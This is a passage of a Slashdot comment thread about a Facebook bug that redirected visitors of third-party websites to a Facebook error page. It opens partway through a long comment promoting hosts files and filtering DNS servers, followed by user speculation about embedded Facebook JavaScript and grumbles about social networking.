C.) Wasting ELECTRICITY (especially if the DNS server is setup as a separate machine) even if run as a service/daemon on a single system as user has

D.) DNS has NUMEROUS faults, & should anyone request a sampling of them? Ask & "ye shall receive"...

---

Thus, using custom hosts files results in BETTER security AND better efficiency, in saving your bandwidth, + electricity even (CPU cycles, RAM, + other forms of I/O as well) & giving you FASTER host-domain name resolution locally vs. remote DNS servers, especially if a NXDOMAIN results (since you do it LOCALLY via verified hardcoded hosts file entries of your favorites, which also gets you speed too as noted, simply to overcome that 1/2 decade unpatched vs. Kaminsky bug worldwide on MOST DNS SERVERS still, in that flaw & yes, others!)

Hosts files hardcodes are not only faster, but safer too, simply since my program uses reverse DNS hardcoded entries tests, to the in arpa addr 'tld' that houses that information from the DNSSEC root 13 servers by ICANN & VERISIGN (to proof vs. the Kaminsky redirect flaw (that remains unpatched for 1/2 a decade now on MOST DNS servers worldwide, worst of all, @ the ISP level!) - which are secured vs. that flaw noted above in redirect poisonings & others)

---

HOWEVER:

I don't "hate" DNS servers!

In fact - I use them myself (since I don't attempt to resolve 'every host-domain there is online' via hosts, only my favorites @ the top of the file, 20 of them, which beats hashtable indexing or b-tree binary seeks past 2++ million records no less).

I use specialized FILTERING DNS SERVERS that help block out malicious sites/servers/hosts-domains via DNSBLs:

---

Norton DNS:

http://setup.nortondns.com/ [nortondns.com]

198.153.192.1
198.153.194.1
198.153.192.60
198.153.194.60
198.153.192.50
198.153.194.50
198.153.192.40
198.153.194.40

OpenDNS:

http://www.opendns.com/home-solutions/ [opendns.com]

208.67.222.222
208.67.220.220

ScrubIT DNS:

http://scrubit.com/ [scrubit.com]

67.138.54.100
207.225.209.66

Comodo Secure DNS:

http://www.comodo.com/secure-dns/switch/windows_vista.html [comodo.com]

8.26.56.26
8.20.247.2

---

ALL in layered formation in both my network connection AND my Cisco/LinkSys stateful packet inspecting router.

(Again - for the concept of "layered-security"/"defense-in-depth": The best thing we have going currently vs. malicious threats online & otherwise...)

---

(Resulting in security AND in saving your bandwidth & giving you FASTER host-domain name resolution locally vs. remote DNS servers, especially if a NXDOMAIN results since you do it LOCALLY via verified hardcoded hosts file entries of your favorites, which also gets you speed too as noted), simply to overcome that flaw & others!

Hosts files hardcodes are not only faster, but safer too, simply since my program uses reverse DNS hardcoded entries tests, to the in arpa addr 'tld' that houses that information from the DNSSEC root 13 servers by ICANN & VERISIGN (to proof vs. the Kaminsky redirect flaw (that remains unpatched for 1/2 a decade now on MOST DNS servers worldwide, worst of all, @ the ISP level!) - which are secured vs. that flaw noted above in redirect poisonings & others)

---

* :)

(Beat THAT with a stick... or better yet? With information that disproves my points (to any 'naysayers' or trolls, that is)).

The Advertiser isn't exactly "straight-up" with you either. Witness these events:

---

Adbanners slow you down & consume your bandwidth YOU pay for (40% of your avg. webpage no less):

ADBANNERS SLOW DOWN THE WEB: -> http://tech.slashdot.org/article.pl?sid=09/11/30/166218 [slashdot.org]

---

And people do NOT LIKE ads on the web:

PEOPLE DISLIKE ADBANNERS: http://yro.slashdot.org/yro/08/04/02/0058247.shtml [slashdot.org]

---

As well as this:

Users Know Advertisers Watch Them, and Hate It:

http://yro.slashdot.org/yro/08/04/02/0058247.shtml [slashdot.org]

---

Even WORSE still, is this:

Advertising Network Caught History Stealing:

http://yro.slashdot.org/story/11/07/22/156225/Advertising-Network-Caught-History-Stealing [slashdot.org]

---

Advertisters never intended to honor "DNT" (Do Not Track):

http://yro.slashdot.org/story/12/09/23/1334258/advertisers-never-intended-to-honor-dnt [slashdot.org]

---

AND, neither do others:

http://yro.slashdot.org/story/12/09/30/1435231/think-tanks-website-rejects-browser-do-not-track-requests [slashdot.org]

---

The webserver program folks even "jumped on the bandwagon" in Apache, as far as "DNT":

http://apache.slashdot.org/story/12/09/08/0053235/apache-patch-to-override-ie-10s-do-not-track-setting [slashdot.org]

---

Talk about "crooked" & telling 1/2 truths (as well as making software that was ONCE quite useful & effective, NOT QUITE AS USEFUL & EFFECTIVE by default anymore!)

Now - I truly KNOW this post will no doubt be downmodded, because Advertisers do NOT want this type of information getting out en-masse to enlighten users - they bought out Ghostery, crippled Adblock, but TRY THAT with a local hosts file (good luck!) especially one a user builds himself!

APK

P.S.=> Malware's present in the banner ads you click on as well, & here are some "examples thereof" over time:

---

THE NEXT AD YOU CLICK MAY BE A VIRUS:

http://it.slashdot.org/story/09/06/15/2056219/The-Next-Ad-You-Click-May-Be-a-Virus [slashdot.org]

---

Yahoo, Microsoft's Bing display toxic ads:

http://www.theregister.co.uk/2011/09/16/bing_yahoo_malware_ads/ [theregister.co.uk]

---

Malware torrent delivered over Google, Yahoo! ad services:

http://www.theregister.co.uk/2009/09/24/malware_ads_google_yahoo/ [theregister.co.uk]

---

Rogue ads infiltrate Expedia and Rhapsody:

http://www.theregister.co.uk/2008/01/30/excite_and_rhapsody_rogue_ads/ [theregister.co.uk]

---

Google sponsored links caught punting malware:

http://www.theregister.co.uk/2008/12/16/google_sponsored_links/ [theregister.co.uk]

---

DoubleClick caught supplying malware-tainted ads:

http://www.theregister.co.uk/2007/11/13/doubleclick_distributes_malware/ [theregister.co.uk]

---

Yahoo feeds Trojan-laced ads to MySpace and PhotoBucket users:

http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ [theregister.co.uk]

---

Real Media attacks real people via RealPlayer:

http://www.theregister.co.uk/2007/10/23/real_media_serves_malware/ [theregister.co.uk]

---

Attacks Targeting Classified Ad Sites Surge:

http://it.slashdot.org/story/11/02/02/1433210/Attacks-Targeting-Classified-Ad-Sites-Surge [slashdot.org]

---

Hackers Respond To Help Wanted Ads With Malware:

http://it.slashdot.org/story/11/01/20/0228258/Hackers-Respond-To-Help-Wanted-Ads-With-Malware [slashdot.org]

---

Ruskie gang hijacks Microsoft network to push penis pills:

http://www.theregister.co.uk/2010/10/12/microsoft_ips_hijacked/ [theregister.co.uk]

---

Major ISPs Injecting Ads, Vulnerabilities Into Web:

http://it.slashdot.org/story/08/04/19/2148215/major-isps-injecting-ads-vulnerabilities-into-web [slashdot.org]

---

Two Major Ad Networks Found Serving Malware:

http://tech.slashdot.org/story/10/12/13/0128249/Two-Major-Ad-Networks-Found-Serving-Malware [slashdot.org]

---

NY TIMES INFECTED WITH MALWARE ADBANNER:

http://news.slashdot.org/story/09/09/13/2346229/new-york-times-site-pop-up-says-your-computer-is-infected [slashdot.org]

---

MICROSOFT HIT BY MALWARES IN ADBANNERS:

http://apcmag.com/microsoft_apologises_for_serving_malware.htm [apcmag.com]

---

ADOBE FLASH ADS INJECTING MALWARE INTO THE NET:

http://it.slashdot.org/story/08/08/20/0029220/adobe-flash-ads-launching-clipboard-hijack-attacks [slashdot.org]

---

London Stock Exchange Web Site Serving Malware:

http://www.securityweek.com/london-stock-exchange-web-site-serving-malware [securityweek.com]

---

Spotify splattered with malware-tainted ads:

http://www.theregister.co.uk/2011/03/25/spotify_malvertisement_attack/ [theregister.co.uk]

---

Demonoid Down For a Week, Serving Malware Laden Ads:

http://yro.slashdot.org/story/12/08/02/1427257/demonoid-down-for-a-week-serving-malware-laden-ads [slashdot.org]

---

Google's DoubleClick spreads malicious ads (again):

http://www.theregister.co.uk/2009/02/24/doubleclick_distributes_malware/ [theregister.co.uk]

---

Ad networks owned by Google, Microsoft serve malware:

http://www.theregister.co.uk/2010/12/13/doubleclick_msn_malware_attacks/ [theregister.co.uk]

---

Hackers Use Banner Ads on Major Sites to Hijack Your PC:

http://www.wired.com/techbiz/media/news/2007/11/doubleclick [wired.com]

---

More dangerous to click on an online advertisement than an adult content site these days, Cisco said:

http://www.securityweek.com/easier-get-infected-malware-good-sites-shady-sites-cisco-says [securityweek.com]

---

As my list "multiple evidences thereof" as to adbanners & viruses + the fact they slow you down & cost you more (from reputable & reliable sources no less).

(Animats/John Nagle, a member here no less who himself contributed to the IP stack itself & I respect him immensely for it, unlike many here (especially trolls) said it best on advertisers & the web -> http://yro.slashdot.org/comments.pl?sid=3359149&cid=42482289 [slashdot.org] )

... apk

Shocking. (0)

Anonymous Coward | about a year and a half ago | (#42831377)

Anyone surprised?

Here Endeth The Lesson. (2)

fuzzyfuzzyfungus (1223518) | about a year and a half ago | (#42831391)

Not that it will; but let that be a lesson to you.

Re:Here Endeth The Lesson. (1)

RobertLTux (260313) | about a year and a half ago | (#42831717)

No NO NO you have to do it right

[play sound: THX Big Note.wav] THUS ENDETH THE LESSON

but anywho if i was one of those sites i would have my legal staff have a chat with Facebook about not having this happen again EVER.

Re:Here Endeth The Lesson. (1)

alostpacket (1972110) | about a year and a half ago | (#42833961)

Thanks teach! I have learned that people rarely learn the lesson. I think. Will this be on the final exam?

Um... How? (1)

camperdave (969942) | about a year and a half ago | (#42831397)

How is that possible? If I'm going to a site, I type in the URL into the address bar, or I click on a favorite, or click on a link returned by Google, or another search engine. The URL gets sent to a DNS server, which returns the IP address of the site, and then my browser starts making http requests directly from the site. Facebook is never involved. Unless Facebook has somehow poisoned the root DNS servers, I don't see how this is possible.

Re:Um... How? (3, Interesting)

belthize (990217) | about a year and a half ago | (#42831437)

I suspect horrible article is the main culprit. At a guess I suspect this is nothing more that Facebook's authentication service failing.

Client is directed to Facebook for authentication, mechanism fails, Facebook tosses up error page. The implication that Facebook did anything wrong other than having buggy authentication is likely way of base.

Full disclosure, don't have a facebook page, never visited a facebook page, have zero interest in facebook.

Re:Um... How? (2, Insightful)

Anonymous Coward | about a year and a half ago | (#42831539)

The key is "client is directed to Facebook". Sites include 3rd party scripts all the time, blindly executing whatever gets sent back. If that includes a simple assignment to window.location, there's your redirect.

Re:Um... How? (0)

Anonymous Coward | about a year and a half ago | (#42831461)

They must have dropped an erroneous document.location = facebook in their JS that all these sites include so you can "like" them

Re:Um... How? (3, Informative)

Culture20 (968837) | about a year and a half ago | (#42831479)

These sites are including javascript from facebook. Check your noscript/requestpolicy lists on those pages and you'll be surprised how many external sites those pages include javascript and images from. This was bound to happen (and worse things have probably happened in secret).

Re:Um... How? (4, Interesting)

Anonymous Coward | about a year and a half ago | (#42831579)

The Steam browser is a nice example of facebook javascript gone wrong. Every page with a "like" script on it redirects to some facebook address as soon as the page finishes loading. The end result is that you see what you wanted to see, but the URL bar is always some sort of lenghty facebook redirect because Steam is trying to load it somehow but fails and leaves you on the page you wanted to visit anyway.

Re:Um... How? (4, Insightful)

Anonymous Coward | about a year and a half ago | (#42831487)

In short, "Web bugs", short bits of code that are included inline from another provider. Basically these sites had on their front page a "get shit from facebook" or some such badge displayed, that badge is not created by the site owner but is sourced inline from facebook, now if the thing they pull from facebook is broken and facebook presents a redirect to your browser in place of the web bug (badge, whatever) then your browser dutifully redirects.

If facebook were malicious they could commandeer half of the web.

Re:Um... How? (1)

omnichad (1198475) | about a year and a half ago | (#42831927)

I successfully made it to Papa John's web site to order pizza last night. When I got to the last page of checkout, I immediately got redirected to Facebook.

Apparently they're including Facebook Javascript code on all their pages, and I happened to be in the middle of ordering a pizza when the bug hit.

Why Javascript is allowed to redirect a web site these days without user intervention is beyond me. Most Javascript methods that open windows or navigate you require being triggered by a click event or other human intervention.

facebook (4, Funny)

hackula (2596247) | about a year and a half ago | (#42831399)

The first successful test. Soon every site will redirect to facebook, then... the world!

Re:facebook (1)

Impy the Impiuos Imp (442658) | about a year and a half ago | (#42831631)

Offer multibillion IPO
2. Seize conttol of internet
3. ???
4. Well, monetizing for profit is still problematic

Re:facebook (1)

omnichad (1198475) | about a year and a half ago | (#42831931)

The ultimate phishing attack.

Details: Logging in from 3rd party sites? (1)

Anonymous Coward | about a year and a half ago | (#42831423)

I was logged into Facebook when I got this redirect.

However, the website I got it from is one I have never placed a Facebook "like" on or written a comment on with my profile.

Does "a bug that redirected people logging in with Facebook from third party sites" mean that the site has my Facebook details?

The URL was this:

https://www.facebook.com/dialog/permissions.request?client_id=__15digitno__&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.website.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D18%23cb%3Df28691eaa8%26origin%3Dhttp%253A%252F%252Fwww.website.com%252Ff1c830d484%26domain%3Dwww.website.com%26relation%3Dparent&sdk=joey

Re:Details: Logging in from 3rd party sites? (5, Informative)

SJHillman (1966756) | about a year and a half ago | (#42831537)

The third-party sites load a chunk of Facebook onto their site, so if you're logged into Facebook then you're logged into that chunk on the third-party site. The third-party site doesn't have your login or information - it's passed between you and the chunk of Facebook on that site. Or at least, that's how it's supposed to work.

It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.

Re:Details: Logging in from 3rd party sites? (1)

Mitreya (579078) | about a year and a half ago | (#42832493)

It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.

Yes, but do we have to?
Most of those websites look crippled until the last of these dozen services finally loads 3 minutes later. Blockbuster.com used to hang (unresponsive) for about 30 seconds while the browser said "contacting adserve...fb.com".

Re:Details: Logging in from 3rd party sites? (1)

CanHasDIY (1672858) | about a year and a half ago | (#42832745)

It's not the 90's anymore... you can load a page that's connected to dozens of different services that are almost completely independent of each other and the page you're on.

For some reason, that makes me a sad panda... :(

Re:Details: Logging in from 3rd party sites? (1)

Anonymous Coward | about a year and a half ago | (#42831585)

You don't need to like or comment. You have been logged automatically (as in: they know where you've been). It's a feature!

Re:Details: Logging in from 3rd party sites? (1)

alostpacket (1972110) | about a year and a half ago | (#42834019)

sdk=joey?

function getJoey()
{
        return "Doh";
}

Single point of failure (2, Interesting)

Anonymous Coward | about a year and a half ago | (#42831435)

Recently we have seen very widespread "single point of failure" issues. Notably with Facebook and Apple who are both so pervasive in society. These firms are constantly doing major and complicated software updates and those updates are propagated either invisibly in the background or introduced through "voluntary" software updates where you don't get major new features unless you do the update and you have to simply live with whatever bugs or feature cripples come along with it.

The fact so many people are dependent on these very small number of very human folks is a large "single point of failure" risk for society and its individual, business, and government segments.

JJ

Re:Single point of failure (0)

Anonymous Coward | about a year and a half ago | (#42831501)

What was the apple one? I don't recollect it

Re:Single point of failure (1)

FireFury03 (653718) | about a year and a half ago | (#42831821)

What was the apple one? I don't recollect it

The only one I can remember was when the server that responds to WISPr probes went down, rendering everyone's ipad unable to connect to a network...

Background:
When an iOS device associates with a wifi network, it makes a web request to apple's server to see if its behind a captive portal. It expects to get back "SUCCESS" (returned by Apple's server) or a captive portal login page (returned by the wifi hotspot). If it doesn't get "SUCCESS" it displays the captive portal page so the user can log in. Unfortunately, Apple's software is unable to cope with the web request not being answered at all, and you end up with a blank "login" page and a non-funcational network connection. Yes, this is the usual quality I've come to expect from Apple, given the numerous problems I've had to deal with since iOS devices started to get popular in the workplace...

Re:Single point of failure (1)

SuricouRaven (1897204) | about a year and a half ago | (#42833095)

Windows does the same thing, but AFAIK the only thing that happens if it doesn't get the OK response is the user gets a little popup balloon from the system tray warning them an internet connection is not available.

Re:Single point of failure (3, Informative)

SJHillman (1966756) | about a year and a half ago | (#42831581)

I use Facebook, I admit it. However, I only use Facebook for Facebook. If I log in to another site, I don't use the "Connect with Facebook" option to log in. If the site only allows you to log in with Facebook, I leave. I've yet to find a mission critical site like banks, etc that use Facebook or another service. Therefore, I'm doing my part to save humanity from the single point of failure.

Re:Single point of failure (1)

alostpacket (1972110) | about a year and a half ago | (#42834077)

Unfortunately it sounds like this bug would have hit users such as yourself also. I think when leaving FB to visit another site it is best to log out.

Multi-instance/multi-profile browsers would also be something nice. Especially those that limit what they report about the machine they are on (less fingerprint via installed fonts/cookies/html5 dbs/flash objects/etc)

Re:Single point of failure (0)

Anonymous Coward | about a year and a half ago | (#42831985)

It's worse than a single point of failure. I remember when twitter broke on a site and would redirect me to the twitter error page if I didn't hit escape fast enough as a page loaded.

This is multiple parallel points of complete failure.

I keep trying to use Facebook. (5, Insightful)

hessian (467078) | about a year and a half ago | (#42831477)

I've come to the conclusion that social networking is screwed up because the people who use it most are the people who are least invested in reality.

Every time I try to use Facebook, I get driven away by the behavior of its users. Not the Instagram dinner plate updates, or the personal drama, because I've already filtered out those people.

It's the sensitivity. People take anything seriously. I posted an article showing that divorce really screws up kids. I got back a half-dozen replies, all from people who'd had divorces, defending their own decisions. When I said that it wasn't personal, they said they still felt attacked.

There were other instances of similar behavior too. People hover around Facebook, looking for some reason to cause a scene. Why was this, I wondered.

It seems to me that if you have found something worth doing in life, you're mostly doing it. That doesn't mean your job. If your job sucks, you've probably got a project on the side. You're not going to devote your time to screwing around, which is what most people on Facebook do.

This means that social networking including Facebook selects out the people who have any direction in life, and leaves the resentful, bored, unemployed, disabled, upset, insane, teenage, etc. and concentrates them in large numbers. This is why so much of the response is crazy.

I should amend the post title. I used to keep trying to use Facebook (and MySpace, Digg, Reddit, Friendster, Pinterest, etc.). But now, I don't. These aren't places where healthy people hang out.

Re:I keep trying to use Facebook. (1)

hodet (620484) | about a year and a half ago | (#42831611)

Facebook free for three months now. I just came to the realization that I was not interacting with all the people I care about in my life on Facebook. I was interacting with them in real life. The only interaction was with "fringe" friends or people you felt obligated to friend because they are "friends of friends" you met somewhere. "Hey great, Joe's wife took a picture of her Big Mac and fries and is enjoying a delicious shake." Ya, I'm outta here.

Re:I keep trying to use Facebook. (1)

Megane (129182) | about a year and a half ago | (#42831625)

Really, the only two-way stuff I use is:

Slashdot, because of the good moderation system and good supply of topics that I want to see other people's comments about as much as the topic itself

and 4chan (yes, seriously) because it's sort of a zero-point energy of random discussion with its default anonymity and constantly expiring threads (it's too much hardcore internet trolling and memes for the average person though) But stay away from /b/, nothing interesting happens there anymore.

I avoid the twits and bookfaces as much as possible. At least 4chan's social cancer is constantly flushed away, unlike twitter and facebook where it stays around and festers.

Re:I keep trying to use Facebook. (1)

rmdingler (1955220) | about a year and a half ago | (#42831715)

Well done. I would add unhappy to your list of qualities that make up the bulk of social site users. Many of the people I know who are regular users remain in contact with old flames even though they are now like Al Bundy. Here's to hoping these extra opportunities to procreate don't result in the psychologically healthy being out-bred by this genotypical subset. Oh wait...

Re:I keep trying to use Facebook. (0)

Anonymous Coward | about a year and a half ago | (#42831803)

I feel personally attacked by your attack of people feeling attacked by your attacking them.

Re:I keep trying to use Facebook. (1, Insightful)

roman_mir (125474) | about a year and a half ago | (#42833743)

I should amend the post title. I used to keep trying to use Facebook (and MySpace, Digg, Reddit, Friendster, Pinterest, etc.). But now, I don't. These aren't places where healthy people hang out.

- yeah, but here, on /., we are the paragon, the shining beacon, the city on the hill, the perfect example of the healthy, both in the mind and in the body. /. - if you feel you are healthy.

Story Subject Fail (4, Informative)

OzPeter (195038) | about a year and a half ago | (#42831485)

Facebook did not "Break major websites". Instead Facebook users who were logged in to Facebook (and hence working under the auspices of Facebook) were screwed over when they went to third party sites. Sheesh .. even TFS explains that.

Are we now starting to refer to the Internet as teh Facebook???

Re:Story Subject Fail (1)

SJHillman (1966756) | about a year and a half ago | (#42831629)

It broke the expected functionality of third-party websites. But I agree that Internet is not Facebook. At most, you might be able to claim Facebook broke a chunk of the WWW, but certainly not the Internet as only websites were affected. It's like saying a minor design flaw in a part used by many different car manufacturers completely disrupted our entire transportation infrastructure.

Re:Story Subject Fail (1)

Sockatume (732728) | about a year and a half ago | (#42832249)

You seem to be under the impression that it was people visiting sites from links on Facebook that had an issue. If you visited any of the sites, directly, while logged into Facebook you were affected.

Re:Story Subject Fail (1)

John Hasler (414242) | about a year and a half ago | (#42832861)

> If you visited any of the sites, directly, while logged into
> Facebook you were affected.

And therefor it affected only Facebook users. Neither the Web nor the Net was broken. Just Facebook.

Re:Story Subject Fail (2)

Bogtha (906264) | about a year and a half ago | (#42832473)

Instead Facebook users who were logged in to Facebook (and hence working under the auspices of Facebook)

I think you've misunderstood. By "logged into Facebook", they don't mean they were actually looking at Facebook at the time. It means they had previously logged into Facebook at some point and their browser has a cookie saved which authenticates them to Facebook.

These people were surfing the web normally. They weren't on Facebook. They got to a site that used Facebook for authentication, and the JavaScript that these sites embedded to enable that had a defect in it that noticed they were logged into Facebook and caused the error.

From the end user's perspective, it was simply a case of surfing as normal, and then suddenly a Facebook error message hijacked the website they were trying to visit.

Re:Story Subject Fail (1)

CanHasDIY (1672858) | about a year and a half ago | (#42832789)

Facebook did not "Break major websites".

This.

Facebook broke Facebook, and some third party sites were affected.

Re:Story Subject Fail (1)

John Hasler (414242) | about a year and a half ago | (#42832813)

> Are we now starting to refer to the Internet as teh
> Facebook???

Well, you're already confounding the Web and the Net.

If it was anyone else... (1)

dywolf (2673597) | about a year and a half ago | (#42831503)

I'd be of the mind that it wasn't a bug, but intentional. But FB? They don't really need the page views....do they? Stock has taken a bit of a dip again since the graph thing came to light...though still high enough that I'm sitting pretty (bought when it was around 19.50 or so).

Annoying! (1)

SirAudioMan (2836381) | about a year and a half ago | (#42831563)

At first I thought I somehow angered facebook and caused my session to get corrupted! Each time I visited a few different news sites after a few seconds It would be redirected to the error page. I ended up having to clear my cache to prevent the annoying redirect. I find facebook is good as a time waster but I find it scary how many sites have access to my logins and can track and control content.

Too big to fail (1)

Anonymous Coward | about a year and a half ago | (#42831771)

Obviously Facebook is too big to fail, so every time they bork the internet we should give them a billion dollars.

Re:Too big to fail (1)

leuk_he (194174) | about a year and a half ago | (#42833379)

No internet company should be too big to fail. .... But we give them billions anyway. Google in advertising, Facebook as "like"people, Microsoft for your desktop OS. Apple because it is shiny.

clear skies fuck you up (1)

Nyder (754090) | about a year and a half ago | (#42831901)

I never use another site to log into a different site. Sure, Facebook is big today, but this is the internet, this is technology. Myspace? Geocities?

What do you do when FB for whatever reason, suddenly stops? All those sites you used to use facebook to log in, you can't get in. You think FB is going to care when their stock is going for pennies?

My suggestion, don't use other sites to handle your log in for you.

My other suggestion: FB is a troll, quit feeding it.

Re:clear skies fuck you up (1)

omnichad (1198475) | about a year and a half ago | (#42832241)

I participate in comment discussion on the Gawker blogs - Lifehacker, particularly. They took away their own login system after they screwed it up so badly they gave away everyone's password. The community there is nice, but the site owners are stupid. I say, please let them use Facebook. When Facebook stops? They'll give me a way to transition to whatever they choose next.

Of course, if I have a choice, I don't log in with Facebook.

But I believe that Facebook Connect provides enough demographic info back to the site (your email address) that your profile can be rejoined with a new authentication system fairly easily - even if Facebook just disappears at once without any transition period.

A Javascript problem, really (1)

omnichad (1198475) | about a year and a half ago | (#42832161)

Javascript has been putting in security restrictions for a while now. You can't open a new window without a user click. Most browsers now block automatic window popups.

Why are we still allowing something as archaic as a Javascript redirect? We already have meta tags and HTTP header redirects. We don't need browser navigation without a click to exist in Javascript.

Sure, you could blame Facebook - they did put out a bad script, but the fact that this is even possible is really on the browser makers.

Ran into this. Only happened if I was logged in (1)

Christianfreak (100697) | about a year and a half ago | (#42832583)

I was getting this yesterday when reading an article on Mashible. I noticed that it stopped doing it by logging out of Facebook. Probably something I should be doing anyway to prevent them from tracking me all over the place

And . . . (1)

hduff (570443) | about a year and a half ago | (#42833363)

. . . nothing of value was lost.

Facebook is a fun distraction but protect yourself (1)

ohcrapitssteve (1185821) | about a year and a half ago | (#42833783)

Protecting yourself against weird things Facebook does is actually fairly simple. I sandbox FB in it's own browser. It's all I use Firefox for, that and the occasional browser compatibility test, but I reset cookies/cache/etc before and after. Combine that with a fake name and you're largely safe to post whatever you want. Won't fool, like, law enforcement or whatever if they look specifically at you, but it will confuse whatever automated ad/cross site dossier these companies are compiling on you. I tie it to the dumpster gmail address I use when I know I'm going to get spammed (drop in your biz card, win a free happy hour!) and bam, I don't even think I've ever touched the privacy settings menu.

"Quickly Resolved"...? (1)

InvisibleClergy (1430277) | about a year and a half ago | (#42834009)

I noticed this several times across a span of 9 hours, from first notice to last notice. I would hardly call that "quick".

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?